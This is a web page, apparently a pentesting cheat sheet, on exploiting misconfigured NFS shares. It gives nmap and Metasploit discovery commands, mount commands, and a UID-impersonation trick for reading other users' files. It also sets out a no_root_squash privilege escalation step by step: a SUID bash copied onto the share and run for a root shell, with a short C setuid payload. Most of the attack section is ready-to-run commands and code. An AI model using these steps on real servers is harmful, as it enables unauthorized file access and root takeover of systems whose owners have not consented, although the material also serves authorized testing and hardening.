NFS
What is NFS?
NFS (Network FileSysem) is a very stable and powerful file system for sharing storage devices of UNIX/Linux operating systems. Thanks to NFS; The same files can be accessed from multiple computers. It provides convenience in data storage. Instead of installing to the local disk for each application, it allows applications to be shared.| 1 2 | PORT STATE SERVICE VERSION 2049/tcp open nfs |
NFS Pentesting
|
|---|
| port:2049 |
Misconfigured NFS
A lot of data is obtained in file sharing in most of the companies that are tested for network penetration.NFS Service Detection in Network with Nmap
| 1 2 | nmap -n -PN -sS -T5 -p 2049 --script=nfs-showmount 10.10.x.x/24 nmap --script=nfs-ls.nse,nfs-showmount.nse,nfs-statfs.nse -p 2049 10.10.x.x |
Network NFS Service Detection with Metasploit
| 1 2 3 | msf > use auxiliary/scanner/nfs/nfsmount msf auxiliary(nfsmount) > set RHOSTS 10.10.x.x/24 msf auxiliary(nfsmount) > run |
NFS Shares Listing With “showmount”
| 1 | showmount -e 10.10.x.x |
Access to discovered NFS shares
| 1 2 | mount -t nfs 10.10.x.x:/export/home /mnt/connect_path mount -t nfs -o vers=2 10.10.x.x:/export/home /mnt/connect_path -o nolock # You should specify to use version 2 because it doesn't have any authentication or authorization. |
Access to discovered NFS shares with same user UID Permissions
In the terminal we can see the shared arguments and what UID value they belong to a user.| 1 | -rwxr----- 1923 1000 1898 example.doc |
| 1 | umount /connect_path |
| 1 | useradd newuser |
| 1 | usermod -u 1923 newuser |
| 1 | mount -t nfs 192.168.x.x:/export/home /home/newuser/Desktop/connect_path |
NFS no_root_squash/no_all_squash misconfiguration PE
Read the /etc/exports file, if you find some directory that is configured as no_root_squash, then you can access it from as a client and write inside that directory as if you were the local root of the machine.no_root_squash: This option basically gives authority to the root user on the client to access files on the NFS server as root. And this can lead to serious security implications.
no_all_squash: This is similar to no_root_squash option but applies to non-root users. Imagine, you have a shell as nobody user; checked /etc/exports file; no_all_squash option is present; check /etc/passwd`{: .filepath} file; emulate a non-root user; create a suid file as that user (by mounting using nfs). Execute the suid as nobody user and become different user.
Privilege Escalation
Remote Exploit
If you have found this vulnerability, you can exploit it:Mounting that directory in a client machine, and as root copying inside the mounted folder the /bin/bash binary and giving it SUID rights, and executing from the victim machine that bash binary.
| 1 2 3 4 5 6 7 8 9 10 | #Attacker, as root user mkdir /tmp/pe mount -t nfs <IP>:<SHARED_FOLDER> /tmp/pe cd /tmp/pe cp /bin/bash . chmod +s bash #Victim cd <SHAREDD_FOLDER> ./bash -p #ROOT shell |
| 1 2 3 4 5 6 7 8 9 10 | //gcc payload.c -o payload #include <stdio.h> #include <unistd.h> #include <sys/types.h> int main(){ setuid(getuid()); system("/bin/bash"); return 0; } |
Reference: https://secybr.com/posts/nfs-pentesting-best-practicies/
